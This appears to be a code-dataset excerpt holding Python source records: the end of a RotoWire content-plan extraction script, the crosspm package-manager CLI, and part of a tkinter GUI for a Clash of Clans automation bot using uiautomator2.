OrderedDict()\n\n for word in sent.strip().split():\n # ------ resolve team name/city/alias ------ #\n if word in table['Teams']:\n team = word\n elif word in city2team:\n team = city2team[word]\n elif word in alias2team:\n team = alias2team[word]\n else:\n continue\n if not team in current_sent_teams:\n current_sent_teams[team] = True\n else:\n # using team from previous sentence\n team_found = False\n for word in sent.strip().split():\n if word in plural_prons:\n team_found = True\n # neither a new team is found nor a pronoun is referring to a previous team:\n # no team is mentioned in this sent\n if not team_found:\n current_sent_teams = OrderedDict()\n\n for player in current_sent_players.keys():\n player_records = table['Players'][player]\n this_sent_records.extend(player_records)\n for team in current_sent_teams.keys():\n # keep track which team is mentioned, the other one might still be useful\n if team in this_game_teams:\n this_game_teams.remove(team)\n try:\n team_records = table['Teams'][team]\n except:\n pdb.set_trace()\n\n this_sent_records.extend(team_records)\n\n # only one team is mentioned, pass on the other team records in case needed\n the_other_team_records = None\n if len(this_game_teams) == 1:\n the_other_team_records = OrderedDict()\n for rcd in table['Teams'][this_game_teams[0]]:\n value, field, rcd_type, ha = rcd.split(DELIM)\n if value.isdigit():\n value = int(value)\n if not value in the_other_team_records:\n the_other_team_records[value] = [rcd]\n else:\n the_other_team_records[value].append(rcd)\n\n # ------ seperate player/team/city and numbers ------ #\n num2rcds = OrderedDict()\n str2rcds = OrderedDict()\n for rcd in this_sent_records:\n value, field, rcd_type, ha = rcd.split(DELIM)\n if value.isdigit():\n value = int(value)\n if not value in num2rcds:\n num2rcds[value] = [rcd]\n else:\n num2rcds[value].append(rcd)\n else:\n if not value in str2rcds:\n str2rcds[value] = [rcd]\n else:\n str2rcds[value].append(rcd)\n\n this_sent_total_rcds = len(current_sent_players) * RCD_PER_PLAYER + len(\n current_sent_teams) * RCD_PER_TEAM\n cnt = sum([len(v) for k, v in num2rcds.items()]) + sum([len(v) for k, v in str2rcds.items()])\n assert cnt == this_sent_total_rcds\n del this_sent_records\n \"\"\"\n this_game_teams: [team_names]\n num2rcds: {num: [records]}\n str2rcds: {player/team: [records]}\n \"\"\"\n\n # ------ labeling stats patterns ------ #\n sent = mark_records(sent)\n\n phrases = []\n sentence_plan = []\n sentence_plan_numonly = []\n starting_word_pos = word_pos\n\n for mwe in sent.strip().split():\n # include the player/team/city name (alias not available before feature extension)\n if mwe in str2rcds:\n sentence_plan.append(str2rcds[mwe][0])\n phrases.append(mwe)\n pointers.append(','.join(map(str, [word_pos, rcd_pos])))\n word_pos += 1\n rcd_pos += 1\n\n elif mwe.startswith(\"#DELIM\"):\n records, phrase, numbers_are_at = get_records(mwe, num2rcds, the_other_team_records)\n if len(records) > 0:\n sentence_plan.extend(records)\n sentence_plan_numonly.extend(records)\n if not len(numbers_are_at) == len(records):\n print(numbers_are_at)\n print(records)\n pdb.set_trace()\n for n in numbers_are_at:\n pointers.append(','.join(map(str, [word_pos + n, rcd_pos])))\n rcd_pos += 1\n\n phrases.append(phrase)\n word_pos += len(phrase.split())\n\n elif \"#DELIM\" in mwe:\n p = re.compile('#DELIM\\d+#')\n delim = list(set(re.findall(p, mwe)))\n if len(delim) == 1:\n # skip the 0th word\n delim = delim[0]\n pieces = mwe.split(delim)\n phrases.append(pieces[0])\n word_pos += 1\n\n mwe = delim.join(pieces[1:])\n records, phrase, numbers_are_at = get_records(mwe, num2rcds, the_other_team_records)\n if len(records) > 0:\n sentence_plan.extend(records)\n sentence_plan_numonly.extend(records)\n if not len(numbers_are_at) == len(records):\n print(numbers_are_at)\n print(records)\n pdb.set_trace()\n for n in numbers_are_at:\n pointers.append(','.join(map(str, [word_pos + n, rcd_pos])))\n rcd_pos += 1\n\n phrases.append(phrase)\n word_pos += len(phrase.split())\n\n else:\n # ignore this error case\n for d in delim:\n mwe = mwe.replace(d, ' ').strip()\n phrases.append(mwe)\n word_pos += len(mwe.split())\n else:\n phrases.append(mwe)\n word_pos += 1\n\n # filter out sentences nothing is found for the player/team\n if len(sentence_plan_numonly) > 0:\n paragraph_plan.extend(sentence_plan)\n correct_sent = ' '.join(phrases)\n paragraph_text.append(correct_sent)\n # increment by 1 for '.' at end of sentence\n word_pos += 1\n else:\n word_pos = starting_word_pos\n empty_sent += 1\n for _ in range(len(sentence_plan)):\n pointers.pop(-1)\n rcd_pos -= 1\n\n paragraph_plan_ids = [rcd2idx[rcd] for rcd in paragraph_plan]\n\n if not len(paragraph_plan) == len(paragraph_plan_ids) == len(pointers):\n print(paragraph_text)\n print(len(paragraph_plan))\n print(len(paragraph_plan_ids))\n print(paragraph_plan)\n\n print(len(pointers))\n print(pointers)\n sys.exit(0)\n\n if len(paragraph_plan_ids) > 0:\n to_write = True\n paragraph_plan_ids = ' '.join(paragraph_plan_ids)\n paragraph_plan = ' '.join(paragraph_plan)\n paragraph_text = ' . '.join(paragraph_text)\n pointers = ' '.join(map(str, pointers))\n fout_src.write(\"{}\\n\".format(inp.strip()))\n\n else:\n print(\"content_plan empty at {}\".format(idx))\n print(summary)\n to_write = False\n\n if to_write:\n output_count += 1\n\n output_table.append(table_original)\n\n fout_cp_ids.write(\"{}\\n\".format(paragraph_plan_ids))\n fout_cp_tks.write(\"{}\\n\".format(paragraph_plan))\n fout_tgt.write(\"{}\\n\".format(paragraph_text))\n fout_tgt_full.write(\"{}\\n\".format(full_summary.strip()))\n fout_ptr.write(\"{}\\n\".format(pointers))\n\n json.dump(output_table, fout_js)\n\n print(\"{} sentences out of {} are discarded due to empty content plan\".format(empty_sent, sent_count))\n print(\"{} samples are retained\".format(output_count))\n print(\"{} sentences out of {} contains players not available from the table\".format(player_not_found, sent_count))\n print(\"count_missing = {}\".format(count_missing))\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='extract')\n parser.add_argument('--dir', type=str, default='../../rotowire_fg/',\n help='directory of (src|tgt)_(train|valid|test).norm.(tk|mwe).txt files')\n args = parser.parse_args()\n\n for DATASET in ['train', 'valid', 'test']:\n print(\"Extracting content plan from {}\".format(DATASET))\n main(args, DATASET)","sub_path":"dataset/scripts/purification/extract_outline.py","file_name":"extract_outline.py","file_ext":"py","file_size_in_byte":35254,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"362760028","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nCrossPM (Cross Package Manager) version: {version} The MIT License (MIT)\n\nUsage:\n crosspm download [options]\n crosspm promote [options]\n crosspm pack [options]\n crosspm -h | --help\n crosspm --version\n\nOptions:\n Output file.\n Source directory path.\n -h, --help Show this screen.\n --version Show version.\n -l, --list Do not load packages and its dependencies. Just show what's found.\n -v, --verbose Increase output verbosity.\n --verbosity=LEVEL Set output verbosity level: ({verb_level}) [default: {verb_default}].\n -c=FILE, --config=FILE Path to configuration file.\n -o OPTIONS, --options OPTIONS Extra options.\n --depslock-path=FILE Path to file with locked dependencies [./{deps_lock_default}]\n --out-format=TYPE Output data format. Available formats:({out_format}) [default: {out_format_default}]\n --output=FILE Output file name (required if --out_format is not stdout)\n --out-prefix=PREFIX Prefix for output variable name [default: ] (no prefix at all)\n --no-fails Ignore fails config if possible.\n\n\"\"\"\n\n# TODO: Remove 'logging' module usage\n# TODO: Implement 'verbose' and 'verbosity=LEVEL' usage\nimport logging\n\nfrom docopt import docopt\n\nimport crosspm\nfrom crosspm.helpers.archive import Archive\nfrom crosspm.helpers.config import (\n CROSSPM_DEPENDENCY_LOCK_FILENAME,\n Config,\n get_verbosity_level,\n)\nfrom crosspm.helpers.downloader import Downloader\nfrom crosspm.helpers.promoter import Promoter\nfrom crosspm.helpers.output import Output\nfrom crosspm.helpers.exceptions import *\n\n\n# TODO: Upgrade exceptions handling\nclass App(object):\n _config = None\n _args = None\n _output = Output()\n\n def __init__(self):\n self._log = logging.getLogger(__name__)\n self._args = docopt(__doc__.format(version=crosspm.__version__,\n verb_level=get_verbosity_level(),\n verb_default=get_verbosity_level(0),\n deps_lock_default=CROSSPM_DEPENDENCY_LOCK_FILENAME,\n out_format=self._output.get_output_types(),\n out_format_default='stdout',\n ),\n version=crosspm.__version__)\n\n if type(self._args) is str:\n print(self._args)\n exit()\n\n def read_config(self):\n self._config = Config(self._args['--config'], self._args['--options'], self._args['--no-fails'])\n\n def run(self):\n self.do_run(self.check_common_args)\n self.do_run(self.read_config)\n\n if self._args['download']:\n self.do_run(self.download)\n # self.download()\n\n elif self._args['promote']:\n self.do_run(self.promote)\n\n elif self._args['pack']:\n self.do_run(self.pack)\n\n def do_run(self, func, *args, **kwargs):\n try:\n func(*args, **kwargs)\n except CrosspmExceptionWrongArgs as e:\n print(__doc__)\n self._log.critical(e.msg)\n sys.exit(e.error_code)\n\n except CrosspmException as e:\n print_stdout('')\n self._log.critical(e.msg)\n sys.exit(e.error_code)\n\n except Exception as e:\n print_stdout('')\n self._log.exception(e)\n self._log.critical('Unknown error occurred!')\n sys.exit(CROSSPM_ERRORCODE_UNKNOWN_ERROR)\n\n def check_common_args(self):\n log_level = ''\n\n if self._args['--verbose'] and self._args['--verbosity']:\n raise CrosspmExceptionWrongArgs(\n 'implicit requirements --verbose and --verbosity'\n )\n\n if self._args['--verbose']:\n log_level = 'info'\n\n elif self._args['--verbosity']:\n log_level = self._args['--verbosity']\n\n self.set_logging_level(log_level)\n\n @staticmethod\n def set_logging_level(value):\n format_str = '%(levelname)s:%(message)s'\n\n if value.lower() == 'debug':\n format_str = '%(levelname)s:%(name)s:%(message)s'\n\n logging.basicConfig(\n format=format_str,\n level=get_verbosity_level(value),\n )\n\n def download(self):\n\n if self._args['--out-format'] == 'stdout':\n if self._args['--output']:\n raise CrosspmExceptionWrongArgs(\n \"unwanted argument '--output' while argument '--out-format={}'\".format(\n self._args['--out-format'],\n ))\n elif not self._args['--output']:\n raise CrosspmExceptionWrongArgs(\n \"argument '--output' required when argument '--out-format={}'\".format(\n self._args['--out-format'],\n ))\n\n params = {\n 'out_format': ['--out-format', ''],\n 'output': ['--output', ''],\n 'out_prefix': ['--out-prefix', ''],\n 'depslock_path': ['--depslock-path', ''],\n }\n\n for k, v in params.items():\n params[k] = self._args[v[0]] if v[0] in self._args else v[1]\n\n do_load = not self._args['--list']\n cpm_downloader = Downloader(self._config, params.pop('depslock_path'), do_load)\n packages = cpm_downloader.download_packages()\n\n _not_found = any(_pkg is None for _pkg in packages.values())\n if _not_found:\n raise CrosspmException(\n CROSSPM_ERRORCODE_PACKAGE_NOT_FOUND,\n 'Some package(s) not found.'\n )\n if do_load:\n self._output.write(params, packages)\n\n def promote(self):\n cpm_promoter = Promoter(self._config)\n cpm_promoter.promote_packages()\n\n def pack(self):\n Archive.create(self._args[''], self._args[''])\n\n\nif __name__ == '__main__':\n app = App()\n app.run()\n","sub_path":"crosspm/cpm.py","file_name":"cpm.py","file_ext":"py","file_size_in_byte":6216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"289201641","text":"#!/usr/bin/python3\nimport tkinter as tk # note that module name has changed from Tkinter in Python 2 to tkinter in Python 3\nimport json,os,time,threading,logging\nimport uiautomator2 as u2\n\nfrom PIL import ImageTk\nimport PIL.Image\n\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\n\nfrom util import *\n\nfrom GUI.GUI_logs import *\nfrom GUI.GUI_utils import *\n\nfrom COC.COC_Bot import COC_BOT\nfrom COC.Func.Others import Utils as U\nfrom COC.Func.Common import Scenario\nfrom COC.Func.General import General\nfrom COC.Func.Upgrade import Upgrade\nfrom COC.Func.Donation import Donation\nfrom COC.Func.Emu_restarter import Emu_restarter as restarter\n\n\nif not sys.platform == 'win32':\n\timport appscript\n\n\nclass COC_BOT_GUI(tk.Frame):\n\t# This class defines the graphical user interface \n\tdef __init__(self,config, *args, **kwargs):\n\t\t#------------------Loading config------------------------------\n\t\tself.config = {}\n\t\tself._config = config\n\t\tself.loading_config()\t\n\t\tself.loading_languages()\n\t\t#-------------------Basic Windows--------------------------------------\n\t\tself.window = tk.Tk()\n\t\ttk.Frame.__init__(self, self.window, *args, **kwargs)\n\n\t\t#-------------------Initialize widget--------------------------------------\n\t\tself.build_basic_window()\n\t\tself.build_left_part()\n\t\tself.build_right_part()\n\t\tself.build_menu()\n\t\tset_close(self.window, func = self.save_config)\n\t\t#-------------------Initialize function--------------------------------------\n\t\tself.check_resolution()\n\t\tself.init_Func()\n\t\t\n\n\tdef start(self):\n\t\tdef BotRun():\n\t\t\tMyBot = COC_BOT(self._config,self.lang,self)\n\t\t\tMyBot.run()\n\t\t\t#while True:\n\t\t\t#\ttime.sleep(1)\n\n\t\tinfo_update = threading.Thread(target=BotRun, args=[])\n\t\tinfo_update.daemon = True\n\t\tinfo_update.start()\n\n\t\tself.window.mainloop()\n\n\tdef init_Func(self):\n\t\th,w = self.d.window_size()\n\t\tresolution = str(w) + \"x\" + str(h)\n\t\tcoord = load_configure(\"COC/config/\" + resolution + \".json\")\n\t\tself.init_count()\n\t\tself._config[\"Common\"] = Scenario(self,coord,resolution)\n\t\tself._config[\"General\"] = General(self,resolution,coord)\n\t\tself._config[\"Donation\"] = Donation(self,resolution,coord)\n\t\t#self._config[\"Upgrade\"] = Upgrade(self,resolution)\n\n\tdef check_resolution(self):\n\t\t#If it is not emulator, skip\n\t\tif 'emu' not in self._config:\n\t\t\treturn\n\n\t\theight,width = self.d.window_size()\n\t\tif height != 732 and width != 860:\n\t\t\tU.prt(self.lang[\"tips\"][\"resolution_error\"],mode = 3)\n\t\t\treopen = messagebox.askyesno(self.lang[\"titles\"][\"error\"], self.lang[\"tips\"][\"resolution_error\"])\n\t\t\tif reopen:\n\t\t\t\trestarter.Emu(self._config,self.lang)\n\t\t\telse:\n\t\t\t\tU.prt(self.lang[\"tips\"][\"close_bot\"],mode = 3)\n\t\t\t\tss(5)\n\t\t\t\tself.window.destroy()\n\t\t\t\texit()\n\n\n\tdef build_menu(self):\n\n\t\tmenubar = Menu(self.window)\n\t\ttext = self.lang[\"menu\"]\n\n\t\tdef donothing():\n\t\t filewin = Toplevel(self.window)\n\t\t button = Button(filewin, text=\"Do nothing button\")\n\t\t button.pack()\n\n\t\t#-------------------Bots Setting--------------------------------------\n\t\tBOTMenu = Menu(menubar, tearoff=0)\n\t\tdef init_U2():\n\t\t\tos.system(\"python -m uiautomator2 init\")\n\t\tBOTMenu.add_command(label=text[\"initial\"], command=init_U2)\n\t\tdef re_connect_u2():\n\t\t\tself._config['d'] = u2.connect( self._config['device'] )\n\t\t\tself.d = self._config['d']\n\t\tBOTMenu.add_command(label=text[\"reconnect\"], command=re_connect_u2)\n\t\tBOTMenu.add_separator()\n\t\tBOTMenu.add_command(label=text[\"Exit\"], command=self.window.quit)\n\n\t\t#-------------------General Setting--------------------------------------\n\t\tGenMenu = Menu(menubar, tearoff=0)\n\n\t\tGenMenu.add_command(label=text[\"common\"],\n\t\t\t\tcommand=lambda : self._config[\"General\"].set_general(self.window))\n\t\tGenMenu.add_command(label=text[\"donation\"], \n\t\t\t\tcommand=lambda : self._config[\"Donation\"].set_donation(self.window))\n\t\t#GenMenu.add_command(label=text[\"common\"], command=donothing)\n\t\t\n\t\t\n\n\t\t#-------------------Menubar widget--------------------------------------\n\t\tmenubar.add_cascade(label=text[\"setting\"], menu=BOTMenu)\n\t\tmenubar.add_cascade(label=text[\"general\"], menu=GenMenu)\n\t\tself.window.config(menu=menubar)\n\n\n\tdef build_right_part(self):\n\t\tself.right_part = Canvas(self.window,bg = \"white\",width=400,height=800)\n\t\tself.right_part.grid(row = 0, column = 1 ,rowspan = 2, sticky=N+S+E+W)\n\t\tself.set_information()\n\t\tself.set_function()\n\t\tself.test_area()\n\n\t\tplace_image(self,self.right_part,\"COC/res/dragon.png\",150,300)\n\n\tdef test_area(self):\n\t\tself.right_part.create_text(75,530,text = self.lang['Test_Area'], fill=\"darkblue\",font=\"Times 20 italic bold\")\n\t\t#------------------------background-----------------------------------------------\n\t\t#self.logo = tk.PhotoImage(file = \"COC/res/COC_logo.png\")\n\t\tself.logo = PIL.Image.open(self.config['coc_logo'])\n\t\t#image = image.resize((20, 20))\n\t\tself.logo = ImageTk.PhotoImage(self.logo)\n\t\tself.right_part.create_image(230,720,image=self.logo,anchor = NW)\n\t\t\n\t\t#------------------------test button saved in text_button-------------------------\n\t\tself.test_button = list()\n\n\t\tfor i in range(len(self.lang['test_name'])):\n\t\t\tbtn = Button(self.right_part, text = self.lang['test_name'][i],\n\t\t\t\t\t\tanchor = \"center\" , highlightcolor = \"red\")\n\t\t\tbtn.configure(width = 14, activebackground = \"red\", relief = FLAT)\n\t\t\tself.right_part.create_window(30 + (i%3*120) , 560 + (i//3) *40, anchor= NW , window=btn)\n\t\t\tself.test_button.append(btn)\n\n\t\t# find imgs\n\t\tdef search_imgs():\n\t\t\tself.img_list = list()\n\t\t\tif not sys.platform == 'win32':\n\t\t\t\tfind_img = \"ls | grep '.png'\"\n\t\t\telse:\n\t\t\t\tfind_img = 'dir|findstr \".png\"'\n\t\n\t\t\tstream = os.popen(find_img)\n\t\t\timgs = stream.read().split()\n\t\t\tfor img in imgs:\n\t\t\t\tif \".png\" == img.strip()[-4:]:\n\t\t\t\t\tself.img_list.append(img)\n\n\t\t\tself.testfind = ttk.Combobox(self.right_part,values=self.img_list)\n\t\t\tself.right_part.create_window(30 , 560 + 4 *40 + 10, anchor= NW , window=self.testfind)\n\n\t\t#Zoom out\n\t\tself.test_button[0]['command']= lambda: U.zoom_out(self.d)\n\t\t#Screen shot\n\t\tself.shot_mode = tk.IntVar()\n\t\tself.shot_color = tk.IntVar()\n\t\tdef get_cords():\n\t\t\tcord = list()\n\t\t\tfor corp in self.corps:\n\t\t\t\tnum = corp.get()\n\t\t\t\ttry:\n\t\t\t\t\tnum = int(num)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tU.prt(self.lang['tips']['coordinate_error'],mode = 3)\n\t\t\t\t\treturn\n\t\t\t\t\t#raise e\n\t\t\t\tcord.append(num)\n\n\t\t\tarea = tuple(cord)\n\t\t\treturn area\n\n\t\tdef new_shot():\n\t\t\tmode = self.shot_mode.get()\n\t\t\tcolor = self.shot_color.get()\n\t\t\t# 0 color 1 gray self.shot_color\n\t\t\tif mode == 1:\n\t\t\t\tScreen = U.crop_screen(self.d.screenshot(format=\"opencv\"),get_cords())\n\t\t\telif mode == 0:\n\t\t\t\tScreen = self.d\n\t\t\tif color == 0:\n\t\t\t\tU.save_screen(Screen)\n\t\t\telif color == 1:\n\t\t\t\tU.save_screen(Screen,gray = True)\n\n\t\t\tsearch_imgs()\n\n\t\tself.test_button[1]['command']= lambda: new_shot()\n\t\t#Recognize information\n\t\tself.test_button[2]['command']= lambda: self._config[\"General\"].Update_info()\n\t\t#Collect resourse\n\t\tself.test_button[3]['command']= lambda: self._config[\"General\"].collect_resourse()\n\t\t#Remove obstacle once\n\t\tself.test_button[4]['command']= lambda: self._config[\"General\"].remove_single_obstacle()\n\t\t#Test crop Area\n\t\tself.test_button[5]['command']= lambda: U.test_crop(self.d,get_cords())\n\t\t#Test donation\n\t\tself.test_button[6]['command']= lambda: self._config[\"Donation\"].donateOnce()\n\t\t#Test IMAGE\n\t\tself.corps = [tk.Entry(width = 5),tk.Entry(width = 5),tk.Entry(width = 5),tk.Entry(width = 5)]\n\t\tself.binarybound = [tk.Entry(width = 8),tk.Entry(width = 8)]\n\t\tself.test_button[7]['command']= lambda: U.Image_Test(self.d,lower = self.binarybound[0].get().split(\" \"),\\\n\t\t\tmorph = self.corps[0].get() ,upper = self.binarybound[1].get().split(\" \"))\n\t\t#Find test\n\t\tsearch_imgs()\n\t\t#self.testfind = ttk.Combobox(self.right_part,values=self.img_list)\n\t\t#self.right_part.create_window(30 , 560 + 4 *40 + 10, anchor= NW , window=self.testfind)\n\n\t\tself.find = Button(self.right_part, text = self.lang['titles']['find'],\n\t\t\t\t\t\tanchor = \"center\" , highlightcolor = \"red\",\n\t\t\t\t\t\tcommand = lambda: U.test_read_img(self.d, self.testfind.get()))\n\t\tself.right_part.create_window(30 , 560 + 5 *40, anchor= NW , window=self.find)\n\n\t\t# 刷新查找列表\n\t\tself.refresh = Button(self.right_part, text = self.lang['titles']['refresh'],\n\t\t\t\t\t\tanchor = \"center\" , highlightcolor = \"red\",\n\t\t\t\t\t\tcommand = lambda: search_imgs())\n\t\tself.right_part.create_window(75 , 560 + 5 *40, anchor= NW , window=self.refresh)\n\n\t\t#将识别的图片进行处理,文件名与截图前面一直 末尾为_g\n\t\tself.pre_orc = Button(self.right_part, text = self.lang['titles']['revert_test'],\n\t\t\t\t\t\tanchor = \"center\" , highlightcolor = \"red\",\n\t\t\t\t\t\tcommand = lambda: U.revert_test() )\n\t\tself.right_part.create_window(140 , 560 + 5 *40, anchor= NW , window=self.pre_orc)\n\n\t\t#--------------------------Screen Shot by Area-----------------------------------------------------\n\t\ttk.Label(self.right_part,text = \"x1\", relief=\"flat\", background = \"white\").place(x = 30, y = 680)\n\t\ttk.Label(self.right_part,text = \"y1\", relief=\"flat\", background = \"white\").place(x = 30, y = 700)\n\t\ttk.Label(self.right_part,text = \"x2\", relief=\"flat\", background = \"white\").place(x = 100, y = 680)\n\t\ttk.Label(self.right_part,text = \"y2\", relief=\"flat\", background = \"white\").place(x = 100, y = 700)\n\t\t\n\t\tself.right_part.create_window(50 , 680, anchor= NW , window=self.corps[0])\n\t\tself.right_part.create_window(50 , 680 + 20, anchor= NW , window=self.corps[1])\n\t\tself.right_part.create_window(120 , 680, anchor= NW , window=self.corps[2])\n\t\tself.right_part.create_window(120 , 680 + 20, anchor= NW , window=self.corps[3])\n\t\ttk.Radiobutton(self.right_part,text = 'Color', relief=\"flat\", background = \"white\",\n\t\t\t\t\t\tvalue=0, var=self.shot_color).place(x = 170, y = 680)\n\t\ttk.Radiobutton(self.right_part,text = 'Gray', relief=\"flat\", background = \"white\" ,\n\t\t\t\t\t\tvalue=1, var=self.shot_color).place(x = 170, y = 700)\n\t\ttk.Radiobutton(self.right_part,text = self.lang['titles']['full'], relief=\"flat\", background = \"white\",\n\t\t\t\t\t\tvalue=0, var=self.shot_mode).place(x = 235, y = 680)\n\t\ttk.Radiobutton(self.right_part,text = self.lang['titles']['partial'], relief=\"flat\", background = \"white\" ,\n\t\t\t\t\t\tvalue=1, var=self.shot_mode).place(x = 235, y = 700)\n\n\t\t\n\t\tself.right_part.create_window(325 , 680, anchor= NW , window=self.binarybound[0])\n\t\tself.right_part.create_window(325 , 700, anchor= NW , window=self.binarybound[1])\n\n\tdef set_function(self):\n\t\tself.right_part.create_text(65,200,text = self.lang['func_Area'], fill=\"darkblue\",font=\"Times 20 italic bold\")\n\n\t\tself.func = list()\n\t\tfor i in range(len(self.lang['func_name'])):\n\t\t\tself.func.append(BooleanVar(value = self.config['Functionality'][i]))\n\t\t\tdonate = Checkbutton(self.right_part, text = self.lang['func_name'][i],\n\t\t\t\tvariable = self.func[i],bg=\"white\", offvalue = 0, height = 1, width = 10)\n\t\t\tdonate.place(x = 20, y = 230 + i*30)\n\n\tdef set_information(self):\n\t\t#------------------------background-----------------------------------------------\n\t\t# self.img2 = tk.PhotoImage(file= \"COC/res/elixir.png\")\n\t\t# canva.create_image(20,20,image=self.img2,anchor =NW)\n\t\t#------------------------Information Board-------------------------\n\t\tself.right_part.create_text(75,15,text = \"游戏状态\", fill=\"darkblue\",font=\"Times 20 italic bold\")\n\t\tfill_color = [\n\t\t\t\t\t \"brown\",\n\t\t\t\t\t \"red\",\n\t\t\t\t\t \"Green\"\n\t\t\t\t\t ]\n\t\tself.homevillage_img = list()\n\t\tself.info_text = list()\n\t\tself.list_info_widget = list()\n\n\t\tfor i in range(len(self.config['HomeVillage_image'])):\n\t\t\t#self.right_part.create_text(110,50 + 40*i,text = self.lang['info_name'][i],fill = fill_color[i%len(fill_color)])\n\t\t\t\n\t\t\tlabel = tk.Label(self.right_part, text = \"0\", relief=\"flat\", background = \"white\", \\\n\t\t\t\t\t\tfg = fill_color[i%len(fill_color)])\n\t\t\tlabel.place(x = 60 + 140*int(i//3) , y = 60 + 40*(i%3) )\n\t\t\tself.info_text.append(label)\n\n\t\t\timage = PIL.Image.open(self.config['HomeVillage_image'][i]).resize((40, 40))\n\t\t\timage = ImageTk.PhotoImage(image)\n\t\t\tself.homevillage_img.append(image)\n\n\t\t\tself.list_info_widget.append( self.right_part.create_image(20 + 135*int(i/3) ,50 + 40 * (i%3),\n\t\t\t\t\t\t\t\t image = self.homevillage_img[i], anchor = NW) )\n\t\t\n\t\tself.builder_img = list()\n\t\tfor i in range( len(self.config['BuilderBase_image']) ):\n\t\t\timg = PIL.Image.open(self.config['BuilderBase_image'][i]).resize((40, 40))\n\t\t\timg = ImageTk.PhotoImage(img)\n\t\t\tself.builder_img.append(img)\n\n\n\t\t#改变提示为建筑大师资源 和 家乡基地\n\t\tself.info_title = StringVar()\n\t\tself.info_title.set(self.lang[\"titles\"][\"HomeVillage\"])\n\t\ttk.Label(self.right_part, textvariable = self.info_title,\n\t\t\t\t\trelief=\"flat\", background = \"white\", fg=\"blue\").place(x = 60, y = 30)\n\t\t\n\t\ttk.Label(self.right_part, text = self.lang[\"titles\"][\"Cumulative\"],\n\t\t\t\t\trelief=\"flat\", background = \"white\", fg=\"blue\").place(x = 200, y = 30)\n\n\t\ttk.Label(self.right_part, text = self.lang[\"titles\"][\"Others\"],\n\t\t\t\t\trelief=\"flat\", background = \"white\", fg=\"blue\").place(x = 320, y = 30)\n\t\t#self.right_part.itemconfig(self.list_info_widget[2],image = self.list_info_pic[0])\n\n\n\n\tdef build_left_part(self): \n\t\t# Build Left Part log\n\t\ttext = tk.Text(self.frame, height = 0.15, fg = \"white\", bg = \"black\", font=\"Times 20 italic bold\")\n\t\ttext.insert(INSERT,self.lang['log'])\n\t\ttext.grid(row = 0,column = 0, sticky=N+E+W)\n\n\t\tMyLogUi(self.frame,height = 59).grid(row = 1, column = 0)\n\n\n\tdef build_basic_window(self):\n\t\t#------------------------set up windows and title-------------------------\n\t\tself.window.title(\"My CoC Bots\")\n\t\tself.window.geometry(\"800x800\") #wxh\n\t\tself.window.maxsize(1000, 800)\n\t\tself.window.minsize(800, 800)\n\t\t#self.window.resizable(width = False, height = False)\n\t\tself.window.option_add('*tearOff', 'FALSE')\n\t\t\n\t\tGrid.rowconfigure(self.window,0, weight=1)\n\t\tGrid.columnconfigure(self.window, 0, weight=1)\n\n\t\tself.frame = Frame(self.window)\n\t\tself.frame.grid(row=0, column=0, sticky=N+S+E+W)\n\t\tGrid.columnconfigure(self.frame, 0, weight=1)\n\t\tGrid.columnconfigure(self.frame, 1, weight=1)\n\t\tGrid.rowconfigure(self.frame, 0, weight=1)\n\t\tGrid.rowconfigure(self.frame, 1, weight=1)\n\t\n\t# selecting a language\n\tdef select_language(self):\n\t\tlangs = {\n\t\t\t\t\"中文\":'chn',\n\t\t\t\t\"English\":'eng'\n\t\t\t}\n\n\t\tnew_window = tk.Tk()\n\t\tbtn = G.selection(new_window,\"Languages\",langs)\n\t\t\n\t\tdef Set_lang(lang):\n\t\t\tnew_window.destroy()\n\t\t\tself.config['lang'] = lang\n\t\t\tself.save_config()\n\n\t\tfor b in btn:\n\t\t\tb['command']=lambda lang=b['text']:Set_lang(langs[lang])\n\n\t\tnew_window.mainloop()\n\n\t#loading config of languages\n\tdef loading_languages(self):\n\t\t#if it is empty config or language is not set yet, \n\t\tif 'lang' not in self.config.keys() or self.config['lang'] == '':\n\t\t\tself.select_language() #select a language\n\t\t\n\t\t#if there is a profile of language, loading the config\n\t\ttry:\n\t\t\tself.lang = load_configure(\"COC/config/lang/\" + self.config['lang'] + \".json\")\t\n\t\texcept Exception as e: #exit if error\n\t\t\tmessagebox.showinfo(\"Error\", \"language profile error\")\n\t\t\tprint(e)\n\t\t\tself.config['lang'] = ''\n\t\t\t#self.save_config()\n\t\t\texit()\n\n\t#loading config by json file\n\tdef loading_config(self):\n\t\ttry: \n\t\t\tself.config.update(load_configure(\"COC/config/config.json\"))\n\t\t\tself.d = self._config['d']\n\t\texcept Exception as e:\n\t\t\traise e\n\t\t\tmessagebox.showinfo(\"Error\", \"configure error\")\n\t\t\texit()\n\t\n\tdef init_count(self):\n\t\tself._count = { \n\t\t\t\t\"gold\" : -1 ,\n\t\t\t\t\"elixir\" : -1,\n\t\t\t\t\"dart_elixir\" : -1,\n\t\t\t\t\"c_gold\" : 0,\n\t\t\t\t\"c_elixir\": 0,\n\t\t\t\t\"c_dart_elixir\": 0,\n\t\t\t\t\"labor\": 0,\n\t\t\t\t\"builder\": 0,\n\t\t\t\t\"donation\": 0\n\t\t}\n\n\tdef init_config(self):\n\t\tself.config = {\n\t\t\t\"BuilderBase_image\": [\n\t\t\t\t\"COC/res/gold.png\",\n\t\t\t\t\"COC/res/elixir.png\",\n\t\t\t\t\"COC/res/gem.png\"\n\t\t\t],\n\t\t\t\"Functionality\": [\n\t\t\t\tFalse,\n\t\t\t\tFalse,\n\t\t\t\tFalse,\n\t\t\t\tFalse\n\t\t\t],\n\t\t\t\"HomeVillage_image\": [\n\t\t\t\t\"COC/res/gold.png\",\n\t\t\t\t\"COC/res/elixir.png\",\n\t\t\t\t\"COC/res/dark_elixir.png\",\n\t\t\t\t\"COC/res/gold_storage.png\",\n\t\t\t\t\"COC/res/elixir_storage.png\",\n\t\t\t\t\"COC/res/dark_storage.png\",\n\t\t\t\t\"COC/res/Builder_info.png\",\n\t\t\t\t\"COC/res/Master_Builder_info.png\",\n\t\t\t\t\"COC/res/wait.png\"\n\t\t\t],\n\t\t\t\"coc_icon\": \"COC/res/coc_icon.png\",\n\t\t\t\"coc_logo\": \"COC/res/COC_logo.png\",\n\t\t\t\"lang\": \"chn\",\n\t\t\t\"orc\": 